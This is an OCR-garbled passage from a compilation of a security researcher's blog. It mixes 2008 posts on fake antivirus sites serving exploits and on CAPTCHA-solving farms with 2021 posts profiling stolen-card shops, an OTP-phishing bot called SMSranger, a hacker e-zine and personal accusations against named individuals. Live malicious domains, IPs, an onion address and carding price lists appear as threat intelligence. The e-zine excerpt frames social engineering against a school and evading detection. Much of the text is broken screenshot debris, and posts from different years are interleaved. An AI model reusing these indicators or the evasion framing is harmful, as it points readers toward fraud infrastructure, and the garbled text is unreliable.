.net/rediraspx?CID=9725 &AFID=28836 &DID=44292, and given that absvdfd87.com is 
parked at the now known 69.64.145.229, we have a decent smoking gun connecting the two 
campaigns. 


Facebook is often advising that users stay away from weird URLs, does this mean ignor- 
ing [5]lmageShack and Blogspot altogether? The next malware campaign could be taking 
advantage of [6]DoubleClick and [7]AdSense redirectors - for starters. 


. bttp://vil.nai.com/vil/content/v_148955.htm 
. http: //ddanchev.blogspot . com/2008/01/myspace-phishers-now-targeting-facebook.htm 
. http: //ddanchev. blogspot .com/2008/06/phishing- campaign-spreading-across.htm 


. http: //ddanchev. blogspot .com/2008/06/imageshack-typosquatted-to-serve. html 


. http://blog.trendmicro.com/malware-abuses-doubleclicks-open-redirects 
. http: //www.virusbtn.com/news/2008/06_03a.xml?rss 


4.8.25 Fake Security Software Domains Serving Exploits (2008-08-28 12:41) 
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Based on the actual underground forum market proposition the newly launched vendor appears 
to have been persistently and systematically supplying newly obtained and stolen credit cards 
information which in reality means that a lot of people including financial institutions are really 
affected by this boutique stolen credit cards information E-Shop operation. 


1. 
2. https://ddanchev. blogspot .com/2011/10/exposing-market-for-stolen-credit-cards_31.htm 

3 
4. 
5. https://1.bp.blogspot .com/--wh4MQ5rtoU/YasyPaREVRI/AAAAAAAAZFQ/Sb17-ekG9zgbgvdRinD1HPB4iVjtQwx_gCNcBGAsYHQ 
6. 
7. 
8. 
9. https://1.bp.blogspot.com/-k60KWy7w4Vw/Yasy0i90yCI / AAAAAAAAZFA/Hkqb j cYnwesLimLBoKGHaE4YSiri j SHkwCNcBGAsYHQ 
10. 
11. 


17.12.4 Profiling Yet Another Currently Active E-Shop for Stolen and Compromised 
Credit Cards Information - An Analysis (2021-12-04 13:03) 


y.1s .cloucilare.corr 
ugmarket.cc 
10 mxa.maigun.org 


10 mxb.makjur.org 


ugnarkelcc 


I’ve recently stumbled upon yet another currently active online E-Shop for stolen and compro- 
mised credit cards information and I’ve decided to provide some actionable intelligence on its 
online infrastructure including to discuss the possible revenue schemes that could originate 
from the existence of such E-Shops for stolen credit cards information. 
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Sample domain known to have been involved in the campaign: 


hxxps://ugmarket.cc 


Sample screenshots of the rogue and fraudulent E-Shop for stolen credit cards information: 
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Shoping Creditcard 


HOT Cards package! 


NOW: $425 NOW: $800 NOW: $7000 


>» surnow « >» suvnow « >» surnow « 
NOW: $575 NOW: $1100 NOW: $10500 


The possibilities for related fraudulent and malicious online activity that could originate from 
the existence of such E-Shops for stolen and compromised credit cards information are limitless 
in the context of having the bad guys steal actual financial amounts directly from the victims 
or using them in related purchases that also includes the use of [4]money mules to cash out 
the amounts. 


1. https: //1.bp. blogspot . com/-NvGjmnK3PKg/Yat JYUQH6II/AAAAAAAAZGE/KrS j SemaRNsnzAhNrvB671rH67_sqecKACNcBGASYHQ 
2. https://1.bp. blogspot . com/-SxU3GrHUoWA/Yat JIaHwUyI/AAAAAAAAZF4/icalUgOrhk4-wvilwQf7fF_sbsP4_joXwCNcBGASYHQ 
3. https://1.bp. blogspot. com/-_QNGuOFEDpE/Yat JIezhsal / AAAAAAAAZFO/z8xSvHOnh-kE1N2KdTjXxZ28U01sFa0ygCNcBGASYHQ 
4. https: //speakerdeck . com/ddanchev/dancho-danchev-money-mule-recruitment 
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17.12.5 Yet Another Currently Active E-Shop for Stolen Credit Cards Information 
Spotted in the Wild - An Analysis (2021-12-04 13:39) 


Login 


Password | 


Code ? e ? Ss 
Refresh 
| 


~~ BIPAMPEDUZA 


I’ve just stumbled upon yet another currently active E-Shop for stolen and compromised 
credit cards information and I’ve decided to share additional actionable intelligence on its 
online infrastructure including to discuss the possible fraudulent and malicious schemes that 
could originate based on the existence of such E-Shops for stolen and compromised credit 
cards information. 


Sample domains known to have been involved in the campaign: 


https://rescator.cn 

https://rescator.sh 

| 

Sample Dark Web Onion known to have been involved in the campaign: 


http://rescatorfof3pwgux4olwxxcd22yjtuj72kmdltyr6étsr6jfohpnhead.onion 


Sample screenshots from the rogue and fraudulent E-Shop for stolen credit cards 
information: 
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Warning Buy AYMOLESALE Prices 


Important - Buumanve - 7'09'1! - Importante - Wichtig 
Please nate, our main coman is ReSCator.CN 
Our meror oman s ReSCcator.SH 
Our TOR - mirror domain of the shop: 


http://rescatorfof3pwgux4olwxxcd22yjtuj72kmdityr6tsr6jfohpnhead.ONION 


‘You will see this warming 2 more times 


© 2021 Rescater.cn | Rectace Potcy 


RESCATOR |S NOT JUST MORE CHOICE! / ff 03/DECEMBER 2021 


RESCATOR IS NOT JUST MORE CHOICE 
IT’S YOUR CHOICE. WORLD SUPREMACY UPDATED! 


Majestic Valid Rate, Grand Quality! 


“Premium Quality . 
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CARDS DATABASE: 
USA_T(USA) 
CITY+STATE+ZIP+PHONE 


Valid rate: 90% 


TOR 


DELIVERY OF CONFIDENCE, FIRING DUMPS VIRGINITY 
START A NEW STRATEGY, GRAB WHOLESALE PACK! 


Tough Valid Rate, Dazzling Quality 


S| 
S > 
ho \ -_ 
| 
7 . 
i de 
c | , Ls 
; 


Ae 
2 —S ‘a 
Premium Quality 
_— iw a 


DUMPS DATABASE: 
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Dps 6 Bins 


OTE peat 


3A282, 376282 


CC type 
(nin tate 
Bank & State & City 
Bae [Al . 
state [AB ¥ 
oy lA v 


Save money and buy packs at wholesale prices. Pay less - get more. Go to Wholesale section of the shop! 


O Be Cod DebaCredit 
crenet 


OO sites wo 


© srrast wo cee 


iT 


g2ee8 
i ot 


we 


Expires Country Sate City 
o32026 i= n Mom 
O52026 & nm UxEUND 
veoe2s Rg Cris Meors 
onaers RB ce Sacramento 
onze22 & Keeaucky Lenegton 
CC type 
9) aa vine ater 
Bank & State & City 

oe [A ra 

state (Al we 

oe 


© Gxpming 1221 
©) Prone 


© V8 Oennaay 


Exp date (1312) 


(a 


Base Prke Can 
eo |*| a 
oe |" | i 
oe "| 
oe "| ee 
oe |"| a 
“Buy AWHOLESAL ESP 
DebeCreda 
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(a ¥) anus A ‘) Ab) Mina | Manter 
Zips & Bins MASTERCARD 
AMEX 
91111, HM DINERS CLUBINTERNATIONAL | ¥ 
DISCOVER 
ey) 
Cay | A 
380282, 376282 
Country CC type 
A v) agiusa ic Y) AB) Vina | Master 
Zips & Bins Bank & State & City 
91001, Hath en 2) 
A) 
oy (A) 
380262, 376282 


Save money and buy packs at wholesale prices. Pay less - get more. Go to Wholesale section of the shop! 


Counary CC type 
en) ass 


SUi1t, Msi 


360282, 376282 


AMERICAN EXPRESS US 
Save money and buy packs at wholesale prices. Pay less - get MOM Ayericay EXPRESS US CONSUMER 
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CC mark DebitCredit 
Gent Gcreor 
AN! Gold | Eatirsare 
Base Addmonal 
(a) ping s221 
0 Prene 
© V8V Ceeneay 
CC mark OeowCredit 
eT) Boxer Bonen 
——= ik 
_ BANK OF MONTREAL 
[ PREPAID OD expeng 1201 
CLASSIC OC Prone 
PLATINUM 
© V8V Oeemasy 
ss 
ELECTRON 
SIGNATURE 
CORPORATE TSE 
CENTURION 
Goo 
BLUE FOR BUSINESS 
BLUE 


GQoees creo 


© Expeeng 1221 
© Prove 
OC V8¥ Opemeay 


Comnary CC type CC mark Debacreat 


[= ¥) anus (x ) Ab Ying Master ——— a | Giceon Gceece 
AB Geohd | Chatinsers 
Zips & Bins Gark & State & Cry Bese Add®onal 
Siti), Matt Sone | Al aa oy v © Gepineg 1221 
a = 
sm (9) USAT wai 
us vev Olennecay 
Coy (an - usx 
/ a 
380282, 376282 USAW 
usA_O 
USAY 
USAC 
USAZ 
Hey_USA2 i 
Hey_USA 
y 
Save money and buy packs at wholesaie prices. Pay less - get more. Go to Wholesale section of the shop! boc Cheer 
AmercanStores —— 
 Aemencan Tees ; 
oO Bm Care OevinCrest = Mark = Expires. «= Country Sate Cty a _ See Price Cant 
Os sires wo creo PLATINUM «(032028 & n Man vs es um usar ues ° 
MASTERCARD ° 
CAPITAL ONE. 


We have only dumps packages. Bulk mix packages are sold as is. 
Low prices mean you have no ability to replace or refund any package contents. 


Latest the most fresh database: RD-Worldmix 


By Bases By States By Bases&States By Types Codes & States 


By base: 


Price: 3$ per dump for all bases. 


Select base: 
Other bases: 
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‘= Antivirus XP 2008 


Ime =) Free Check | Download 


e — EA . — 
a 


Psychological imagination, "think cybercriminals" mentality or scenario building intelligence, 
seem to always produce the results they are supposed to. On Monday, [1]I pointed out that : 


"Ironically, the participant in the affiliate program whose original objective was to drive 
traffic to the fake security software’s site, may in fact start receiving so much traffic due to 
the combination of traffic acquisition tactics, that [2]Jintroducing client-side exploits courtesy 
of a third-party affiliate network, may in fact prove more profitable then the revenue sharing 
partnership with the rogue security software’s vendor at the first place." 
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We then securely 
route your call 
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With SMSranger it 
has never been 


easier to capture OTP 
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SMSranger 


" cliavic APMIC;oyVYYyIt ray trevuc 
- enable Email mode Hi 
- enable Bank mode [fj 
- enable Carrier mode Gl 


[bank 


Please Provide your phone number e.g 
#12345 


Ok, 
Reply with your name 
(company of the service e.g: TD Bank) 


request will expire in 1 minute. 
~ SAUL SECEIIAULIUE BELO TI At at 


td canada trust 


| Calling 
, from 
td canada trust 


j 
‘ 


| Send OTP Code 
| OTP is 775625 


Hung up ( 
1 Ended. | 
‘ Call again? 


or N): 


oO make another ca 


> 0:59/ 1:07 
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SMSranger 


Please Provide your phone number e.g 
#12345 


lhelp 


show commands available 
- enable PayPal mode 
enable Account mode yx 
enable Apple/Google Pay mode 
enable Email mode Hi 
enable Bank mode [fj 
enable Carrier mode Gil 


/bank 


Please Provide your phone number e.g 
#12345 


+14165774117 


Ok, 
Reply with your name 


, request will expire in 1 minute. 


td canada trust 


ila 
, Calling 
from 
td canada trust 


& On Call \( 


Send OTP Code 


> 0:49/1:07 
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The next day, [3]client-side exploits start getting introduced "in between" the fake security 
software sites : 


"I’ve blogged before about the problem of Google Adwords pushing Antivirus XP Antivirus 
2008. The situation is still ongoing. However, it’s taken a turn for the worse, as these XP 
Antivirus pages are pushing exploits to install malware on the users system. This will also 
affect the many syndicators of Google Adwords." 


The domain in question bestantivirus2009.com - (68.180.151.21) is hosting the binary 


at bestantivirus2009 .com/setup 1096 MTYwM3wzNXww _.exe and has an IFRAME pointing 
to huytegygle .com/index.php (200.46.83.246). 
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SMSranger 


Today 


ela 


Please Provide your phone number e.g 
#12345 


show commands available @ 
enable PayPal mode 
enable Account mode px 
enable Apple/Google Pay mode 
- enable Email mode Hi 
enable Bank mode {fj 


enable Carrier mode Gil 
/bank 


Please Provide your phone number e.g 
#12345 


ACTF 


Reply with your name 
(company of the service e.g: TD Bank) 


f request will expire in 1 minute. 


td canada trust 


f Calling 
from 


td canada trust 


P 0:24/1:07 
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SMSranger 


- enable PayPal mode 
enable Account mode px 
enable Apple/Google Pay mode 
- enable Email mode Hi 
enable Bank mode [jj 
- enable Carrier mode Gil 


[bank 


Please Provide your phone number e.g 
#12345 


#141657 74117 
Ok, 


Reply with your name 
(company of the service e.g: TD Bank) 


request will expire in 1 minute 


td canada tr 


> 0:19/ 1:07 
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SMSranger 


TUU! UII SWWP SIIUP IU! dil SIS Hleecus 
Capture OTP and info with a press of a button 
Vv 


Today 
/start 


Please Provide your phone number e.g 
#12345 


/help 


show commands available @ 
enable PayPal mode 
enable Account mode px 
enable Apple/Google Pay mode 
enable Email mode Hi 
enable Bank mode {fj 
enable Carrier mode Gil 


> 0:09/ 1:07 
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wllTe ® 


Bill Gates 


Today 
ok one sec 


Unread Messages 


gotta find all my old commands 


2 ° 


Two in one day 
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4:56 


<4 Snapchat 


102 SMSranger Premium Chat 


* 


then try chase 


414740 and 414720 


Unread Messages 


i try it.. cant add cant add 


clear device 


iS) card not added 


“hmm let me help you find bins 


hmm let me help you find bins 


ak , : 
} if can help - will be super 
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SMSranger Premium Chat 


» Anyone doing Zelle for btc? | need to 
load up 


Cc 


Anyone doing zelle for btc? | need to load 


Pm me 
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SMSranger Premium Chat 


&) today’s wingds 


MAT 


Unread Mes 
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wil LTE 


SMSranger Premium Chat 


e) 


meee Pin * 
ATi. 


And code 
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_ 


* Antivirus XP 2008 pn 


© 200k POOF meerrumonst Views Research Lab 


Here’s another example antivirus0003.net with an IFRAME pointing to a different location - 
124.217.250.85 / ave/etc/count.php?0=16. 


Despite that these domains are part of the "International Virus Research Lab" fake domains 
portfolio, it remains to be seen whether others will start multitasking as well. 


1. http: //ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_25.htm 


2. http: //ddanchev. blogspot .com/2008/02/serving-malware-through-advertising. htm 


3. http: //sunbeltblog. blogspot .com/2008/08/xp-antivirus-2008-now-with-sploits.htm 


4.8.26 Exposing India’s CAPTCHA Solving Economy (2008-08-29 21:38) 
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17.12.8 Presenting Astalavista.box.sk’s Flagship "Wisdom Kings Magazine" - Issue 
One - Grab a Copy Today! (2021-12-09 10:00) 


Dear blog readers, 

I’ve decided to let everyone know that | just released and came up with Astalavista.box.sk’s 
flagship E-Zine for hackers security cybercrime research OSINT and threat intelligence and 
actually released issue one of the E-Zine which you can grab a copy of on my personal blog in 
the true spirit of the Christmas holidays. 


Wisdom Kings Magazine Issue One - "Existence is Futile, Relevance Is Non-Existent" 


+ OL. INCrOGUCTION..........ccccececceeeeeeessenseneaeenes by Phemonix 
+ 02. 10 years back in the fUuture.........ccceeeeeeee ees by Phemonix 
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a O2.! BACK tO DASICS’ sscivsswiieta ec scaesetiachineneles by Phenomix 


+ 03. The basics of Social engineering...........ccee by Phenomix 

+ 04. How to make anarchy for beginnersS.............008 by Phenomix 

+ 05. How to hack fOr FUN... eee eeceeeeeeee teen eeees by Phenomix 

+ 06. The ultimate guide to getting a girlfriend.......... by Phenomix 

+ 07. Exploiting the scene for fun and profit............. by Phenomix 

+ 08. Hacking your school for fun and profit.............. by Phenomix 

+ 09. Exposing the "Data Leaks” Paradise.................. by Phenomix 

+ 10. How not to get "Caught" ...........cceseeseeeeeea ees by Phenomix 

+ 11. CYBERINT and Virtual SIGINT Exposed................. by Phenomix 
+ 12. From Cybercrime to Multi-Billion Dollar Industry....by Phenomix 
+ 13. The "Dark Web" Exposed and Profiled................. by Phenomix 
+ 14. Exposing the Bastards who stole the Scene........... by Phenomix 
+ 15. Top 20 Hacking Sites and Hacking Forum.............. by Phenomix 
+ 16. Greetz and Shouts go out to.......... ee by Phenomix 

dF: COMCIUSIONs.covitovtieeldielassettvcesesatidss by Phenomix 


01. Introduction 

Greetings, 

Welcome, to the first issue of Wisdom Kings Magazine. 
Let us introduce, ourselves. 


Over the years the demise of the scene greatly contributed to the overall irrelevance of 
the basic principles that used to drive it - knowledge and power and yes irrelevance. 


With major scene information repositiories and hacking sites going down the landscape 
greatly re-transformed itself into a commercial landscape re-transforming the scene the way 
we know it into a commercial paradise in particular the rise of the Threat Intelligence and 
Virtual CYBERINT marketplace consisting of thousands of active participants sharing data 
information and knowledge on current and emerging cyber threats and cyber threat attack 
vectors including a multitude of nation-state sponsored and tolerated Cyber Threat Actor 
adversaries successfully running a huge portion of fraudulent and malicious online campaigns 
and participating in a multi-million dollar underground Cybercrime Ecosystem. 


The first issue of "Wisdom Kings" aims to inform and educate on the basic principles 
that used to drive the Scene - knowldge information and power. 


Happy hacking! 


Greetz, 

Phenomix 

Web site: [1]https://astalavista.box.sk 
Email: [2]dancho.danchev@hush.com 


t-t-+4-+-+4-4-+4-+-+4-4-+4-4-4+ $-4-4-4-4+ 
+ 01. Setting them straight - 10 years back in the future 
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The year is 1998 and Progenic’s Top 100’s has just added yet another hacking group’s 
portfolio such as for instance among my favorite hacking and security resources which 
included at the time - Warlndustries, System7, Blackcode, Progenic. Web Fringe, Neworder 
and TechnicalWarfare. 


What was really taking place within the Scene and the Industry at the time? With new 
hacking and community projects continuing to pop-up on a daily basis it wasn’t largely a 
surprise that a new generation of novice and amateur hackers was just beginning to take place 
with vast repositiories of tools and tutorials including articles and guides publicly accessible for 
everyone to take advantage of and most importantly to get in touch with someone and to learn. 


What did we managed to achieve throughtout the past decade in terms of innovation 
development knowledge and data spreading to thousands of novice and experienced users 
across the globe? Let’s take for instance the Threat Intelligence market segment - a pio- 
neering passive and active virtual SIGINT marketplace with hundreds of groups participating 
including thousands of malicious and fraudulent online actors utilizing and relying on basic 
quality assurance and malicious economies of scale type of market-driven factors to scale 
their cybercrime and fraud-driven operations online prompting a systematic and nation-state 
driven response to a growing set of economic and financial terrorism type of online activity 
largely provoked by a specific set of Russian and Eastern European online adversaries. 


Among my favorite personal Web site bookmarks at the time were the NBA.com includ- 
ing various other X-Files and related UFO-themed video and photo archive type of personal 
Web sites. 


Believe it or not among the early basics of Technical Collection that | managed to in- 
quire were throughout the public and proprietary research published by a company called 
iDefense which was basically always there to provide the necessary intelligence on current 
and future cyber groups and current and future cyber actors which greatly inspired me on my 
way to do my research in the field of OSINT (Open Source Intelligence) and later on Cybercrime 
Research and Threat Intelligence gathering. Who were the hackers and what were they up 
to? What tools did they use? How famous were they at the time? How did they manage to 
achieve all of this? 


Remember the U.S-China crashed airplance skirmish? If it’s going to be massive it bet- 
ter be good. What this incident clearly showcased at the time is the possible offensive cyber 
warfare scenario where U.S based and China-based hackers actually popped-up online to 
defend and actually launch attacks against each other potentially signifying one of the first 
major international cyber incidents at the time. 


With TextFiles.com additions continuing to pop-up among the first and most notable sec- 
tions that truly made me an impression and actually inspired me to get involved in the world of 
Hacking and basically the Scene was the Anarchy and Phreaking and Hacking sections next to 
the daily visits to Progenic.com Top100 list of hacking and security Web sites to actually catch 
up with the votes and check the new additions to the list to potentially obtain various hacking 
tools and trojan horses futher motivating me to work with them and potentially show them 
and share them with some of my closest friends of the time circa the 90’s for the purpose of 
attempting to trick irc.dal.net users from various channels including #gay and #lesbians into 
accepting the latest bogus "screensaver" while exploiting a common flaw in the actual mIRC 
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client where you could easily make it look like that the actual user is receiving an image which 
in reality was actually an executable part of the server client of a popular trojan horse release 
at the time. 


01. Back to basics 


When was the last time you actually bothered to visit the archive.org looking for old 
copies of your favorite Web sites to possibly inspire you on your way to achieve your latest 
project in the field of Intelligence Studies and the Information Security market segment or to 
actually upload your old UFO photos and videos collection online? Keep reading. 


Among the key Web sites that you should consider visiting using archive.org include: 


- Progenic.com 

- TextFiles.com 

- Webfringe.com 

- Newoder.box.sk 

- rootshell 

- packetstormsecurity 


Including the following modern alternatives in terms of your will and desire to acquire 
data information and knowledge: 


- C4l.org 
- packetstormsecurity 
- link-base.org 


The Definite Manual to Helping Re-surrect the Scene and the Security Industry in this 
particular case would be for novice users to launch a personal blog where they can share 
their ideas and actual research publications with the rest of the security community and the 
Scene including to launch and maintain something in the lines of a file and security directory 
repository next to a personal Web site or a YouTube vlog that also includes a podcast including 
to publicly host and share their research and presentations. 


03. The Basics of Social Engineering 

01. Introduction 

Social engineering is the art, of portraying, a situation, to one’s perceivable conscious 
needs, for, the purpose, of pre-emptively, portraying, the same situation, seeking long term 
and short team, social gain. 

02. Picking up a target 


For the purpose of this article, we’ll pick up your local school. 


You can be anything, that, you, want to be. It’s all a matter of perspective. And objec- 
tive. Setting up the right, expectations, when, assuming to, own, a target, is vital, for the 
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success of your, attack. 


Successfully, presumuing, the very best, in a, person, greatly, ensures, your success, 
from a self-positioning, potentially, owning, phrase, of the actual communication. We’re all 
elite, when, we, tend, to rock, together. The difference? 

We rock for ourselves. Our wisdom is our king, and our king is our prevalence. Pre-dominantly, 
positioning, ourselves, as communication, 


Invite: 
CrackZ@hotmail.com 


09. Exposing the "Data Leaks" Paradise 


In a world dominated by a countless number of malicious and fraudulent cyber threat 
actor adversaries including the rise of the "penetration testing" crowd whose ultimately goal 
is to actually lower down the entry barriers into the World of Information Security potentially 
resulting in thousands of enthical and unethetical penetration testing aware users across the 
globe who have the capacity and the potential to target thousands of legitimate Web sites 
in an attempt to take advantage of the "low-hanging fruit" it should be clearly noteated that 
throughout the past couple of years a new generation of wannabe hackers and information 
security enthusiasts began to take place namely the rise of the data brach and data leaks 
community within the Information Security Industry whose ultimately goal is to actually obtain 
access to compromised and potentially leaked database of confidential records including 
high-profile data leaks in the context of government-based leaked data that will be later on 
eventually traded and attempted to be taken advantage of in the context of launching targeted 
phishing and malware-spreading campaigns potentially affecting hundreds of thousands of 
users in the process. 


The very notion that cybercriminals including white hat security experts and cybercrime 
fighters will eventually attempt to obtain access to for instance a compromised cybercrime 
forum for the purpose of exposing the personal details of its users that also include to possibly 
track down and geolocate including to actually profile and prosecute some of its members 
should be definitely considered as an old-fashioned trend in the actual fight against cybercrime 
online with more users and researchers joining the fight including the actual cybercriminals 
who might take additional measures to actually protect and prevent possible data leaks 
including various other OPSEC (Operational Security) type of measures in terms of positioning 
their cybercrime-friendly forum community as a invite-only or actually launching it in aa 
vetted and invite-only fashion. 


What’s should be clearly noted is that with the mainstream media continuing to raise 
awareness on the existence of high-profile hacking groups and hackers including the rise 
of the Anonymous crowd it should be clearly noted that wannabe and potential hackers 
would continue trying to steal the necessary media attention and actual "know-how" from 
high-profile hacking groups and individual hackers involved in high-profile data leaks and data 
breaches. 


10. How not to get "caught" 


Have you ever dreamed of getting "caught" and actually making the headlines with your 
latest research that also includes the digirally naughty party of your research? It should be 
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clearly noted that every decent security researcher and wannabe hacker should take basic 
pracautions for the purpose of ensuring that their online activities including access to their 
research remains properly protected from nation-state and fellow researcher’s access with 
basic OPSEC (Operational Security) in mind which basically includes basic "sock-puppet" type 
of online personas including the active use of proprietary and off-the-shelf VPN (Virtual Private 
Network) including the active use of anti-fingerprint based browser including basic online 
pracautions such as for instance the use of PGP and end-to-end real-time communication 
encryption for the purpose of getting involved in related projects and actually keeping in touch 
with fellow colleagues and researchers. 


Let’s discuss some basic OPSEC (Operational Security) principles and offer an in-depth 
discussion on various practical OPSEC tactics and strategies for the purpose of ensuring 
that your online activity remains properly protected including the actual protection of your 
intelellectual "know-how" and research and analysis data. Among the first basic principles 
that you should properly ensure is the active use of basic "hardware-isolation" principles that 
also includes the active use of a proprietary commercial and off-the-shelf VPN service provider 
such as for instance Cryptohippie. 


14. Exposing the Bastards who the Scene 


It used to be a situation where technological "know-how" and operational capabilities to 
make an impact globally used to be the primary motivation factor for an entire generation of 
hackers/crackers/phreakers and security experts globally today’s modern and sophisticated 
security industry with hundreds of participants and high-profile experts who are basically 
responsible for protecting high-profile and nation-state networks including their direct involve- 
ment in high-profile and sensitive security and cyber intelligence gathering projects where 
everyone is busy gathering cyber intelligence including to actually take the game a little 
bit deeper potentially causing widespread industry buzz in case where a successful cyber 
attack attribution takes place or in case where the team of professionals somehow manages 
to establish a direct relationship between a cyber attack instance with a real-life person ora 
group of people most notably hackers or another team of high-profile or nation-state hacking 
group or a team of professional security experts. 


Do you remember the Scene the way we know it circa the 90’s? Who were some of 
your favorite high-profile researchers at the time including high-profile hackers and security 
experts? Did you hang out a lot on IRC? Have you ever dreamed of speaking with a hacker or 
joining a hacker group on your own? Keep reading. 


In this article I’ll discuss in-depth the Scene the way we know it circa and try to compile 
in-depth personal dossiers of some of the people that inspired me to join the Scene and the 
security industry at the time and offer an in-depth overview and discussion of their professional 
path and achievements circa the 90’s up to present day and basically explain and actually 
expose the bastards who stole the scene. Keep reading. 


16. Greetz and Shouts go out to 
In this section we wanted to take the time and effort and elaborate more on folks that 


we know touch base with work with cherish and continue to support in a variety of projects 
namely: 
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reload ok 
[reload ] WIHOHK (ot) 
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Loading 
Loading 
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"Are you a Human?" - once asked the CAPTCHA, and the question got answered by, well, a 
human, thousands of them to be precise. Speculations around one of the main weaknesses of 
CAPTCHA based authentication in the face of human CAPTCHA solvers, seems to have evolved 
into a booming economy in India during the past 12 months, with thousands of people involved. 


The following article - "[1]lnside India’s CAPTCHA solving economy" aims to expose legit- 
imate data entry workers, whose business models and techniques are in fact used by Russian 
cybercriminals not only for personal phishing, spamming and malware spreading purposes, 
but also, to resell the bogus accounts and earn a premium in the process : 


"No CAPTCHA can survive a human that’s receiving financial incentives for solving it, 
and with an army of low-wagedIndia CAPTCHA breakers human CAPTCHA solvers Officially in 
the business of “data processing” while earning a mere $2 for solving a thousand CAPTCHA’s, 
I’m already starting to see evidence of consolidation between India’s major CAPTCHA solving 
companies. The consolidation logically leading to increased bargaining power, is resulting 
in an international franchising model recruiting data processing workers empowered with 
do-it-yourself CAPTCHA syndication web based kits, API keys, and thousands of proxies to 
make their work easier, and the process more efficient." 


Cybercrime is just as outsourceable as CAPTCHA breaking is these days. 


UPDATE: [2]Slashdot, [3]BoingBoing, [4]Ars Technica, and [5]The Tech Herald picked up 
the story. 
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- Lance Spitzner from the Honeynet Projects who personally invited me to visit the GCHQ back 
in 2008 and make a presentation 


- Steve Santorelli from Team Cumry who personally invited me to visit the INTERPOL HQ 
in Lyon and make a presentation at an invite only conference 


- John Young from Cryptome.org for keeping it cool and for keeping in touch throughout 
the years and for maintaining the repositiory. 


1. https://astalavista.box.sk/ 
2. mailto:dancho.danchev@hush. com 


17.12.9 (2021-12-09 10:02) 


17.12.10 What You Get From "Peasant-aria Land" - A New Cyber Security Center - 
Behold Yourself To the Almighty Savior! - An Analysis (2021-12-10 20:42) 


[1] 
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Is it crap or is it bullshit? Is it a dipshit or is ita moron? Did the Klingons did it or did we do it 
on our own? Did Jessus give us the money or did we steal it from somewhere? No. It’s called 
[2]cyber security industry in [3]Bulgaria in 2021 led managed and operated by the infamous 
[4]Yavor Kolev who kidnapped and home molested me with a stolen ID and dragged me out of 
my place with no witnesses and no legal repercussion for his illegal activities in the country and 
my illegal arrest with the assistance of local police offers from the city of Troyan, [5]Bulgaria 
circa 2010 which is my hometown in Bulgaria. 
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In this post I'll elaborate more on one of my kidnappers who greatly contributed to my illegal 
arrest courtesy of Bulgaria Law Enforcement and basically dragged me out of my place with 
a stolen ID and held me hostage for a period of several months in a confined environment 
without Bulgaria Ministry of Interior knowing anything about this and with no witnesses and 
with force which resulted in a direct loss of $85,000 throughout the next period of five years 
following a successful kidnapping and home molestation attempt courtesy of local police 
officers from Troyan Bulgaria which is my home town which you can catch up in terms of going 
through the related posts at the end of this post. 


[7] 
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[10] 


[11] 
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arian Exception: 


Organized Crime feeds ¢cé 
Bulgaria. The country 
is ruled now by true criminals; 


\[ 
This is possible because’ 
of the Western Realpoliti 
«Doublethink», and «Our- 
Bitch» doctrine. 


[12] 


The “Buddha Files” 
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AMMNOETTA He CHAOBNTS FoyERpONNE. speasosaret seobxogenoeTTa 


OF APAArARe He nome, *bertuees OnepaTeeKe meTOAN Ha pabors 
© sonrpoa. 


Confirming ‘Borissov.: con 
criminal- background» --- 


Stay tuned! 


Related posts: 


[13]Dancho Danchev’s Disappearance - An Elaboration - Part Two 
[14]Dancho Danchev’s Disappearance 2010 - Official Complaint Against Republic of Bulgaria 
[15]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 


- Part Three 
[16]Dancho Danchev’s Disappearance - 2010 - Official Complaint Against Republic of Bulgaria 


- Part Two 
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[17]Deep from the Trenches in Bulgaria - Part Three 

[18]Deep from the Trenches in Bulgaria - Part Two 

[19]How | Got Robbed and Beaten and Illegally Arrested by a Local Troyan Gang in Bulgaria 
[20]A Profile of a Bulgarian Kidnapper - Pavlin Georgiev (NaBpnuH Feoprues/Bacun Moes 
Tayescku/ABop Kones) - An Elaboration on Dancho Danchev’s Disappearance circa 2010 - An 
Analysis 
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. https://wikileaks.org/wiki/Category:Bulgaria 
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ttps://ddanchev. blogspot . com/2021/09/deep-from-trenches-in-bulgaria-part-two.htm 


19. https: //ddanchev.blogspot . com/2020/12/how- i-got-robbed-and-beaten-and.htm 
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ttps://ddanchev. blogspot .com/2021/11/a-profile-of-bulgarian-kidnapper-pavlin.htm 


17.12.11 Happy Holidays, Everyone! (2021-12-14 19:23) 


If it’s going to be massive it better be good. Did you grab a free PDF copy of my [1]personal 
memoir? Have you ever wanted to find out how many people actually brag about and care 
about my personal blog? Check out the following screenshots. 


Don’t forget to be the best and that you should aim to [2]nuke the rest. 
Happy holidays and happy New Year and Christmas celebration! 
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[3] 


Aggregate Item Use Stow stats for |altme —¥] 


Wednesday, December 14, 2005 — Saturday, September 14, 201° 
* 2,572,020 Views oF 1038 items 
* 6,497,440 clICKS back to the site on 1217 items 


[4] 


Feed Stats Dashboard mov wats fer | al te : 


Dancho Danchev's Blog - Mind Streams of Information Securtty Knowledge 
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Stay tuned! 


. https://www. youtube. com/watch?v=kjAuUXdSFaM 
6. 
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17.12.12 Sample Cybercrime Incident Response and Cyber Threat Actor Attribution 
Campaigns Maltego Graphs - An Analysis (2021-12-14 19:25) 


Did you miss me folks? Guess what? Christmas came earlier! Check out the following Maltego 
graphs courtesy of me during the research and investigation of various cybercrime incident 
response cases including various cyber threat actor attribution campaigns. 


Enjoy! 


18509 


18510 


ie 
2 


[6] 


18511 


18512 


ae \ / = e 
eee / Pa. eae 
——nnf SHY 2 se. 
@ P ae & 
ne en ee 
SS Sa 


= T% nee 
= a 
a 2. 


[11] 


Related posts: 

[6]The Unbreakable CAPTCHA 

[7]Spam coming from free email providers increasing 
[8]Gmail, Yahoo and Hotmail’s CAPTCHA broken by spammers 
[9]Microsoft’s CAPTCHA successfully broken 

[10]Vladuz’s Ebay CAPTCHA Populator 

[11]Spammers and Phishers Breaking CAPTCHAs 

[12]DIY CAPTCHA Breaking Service 

[13]Which CAPTCHA Do You Want to Decode Today? 


1. http: //blogs.zdnet .com/security/?p=183 
2. http: //it.slashdot . org/it/08/08/30/1219235.shtm 
. http://www. boingboing .net/2008/08/30/indias-underground-c.htm 


http: //arstechnica.com/news.ars/post/20080901-captchas-f1lummox-bots-but-may-be-doomed-by-captcha-farmers. 


. bttp://www.thetechherald.com/article.php/200835/1899/CAPTCHAs- are-dead-%E2/80/,93-new-research-from-Dancho 
6. 
7 
8 
9 
10. 
1 
12. 
13. 


4.9 September 


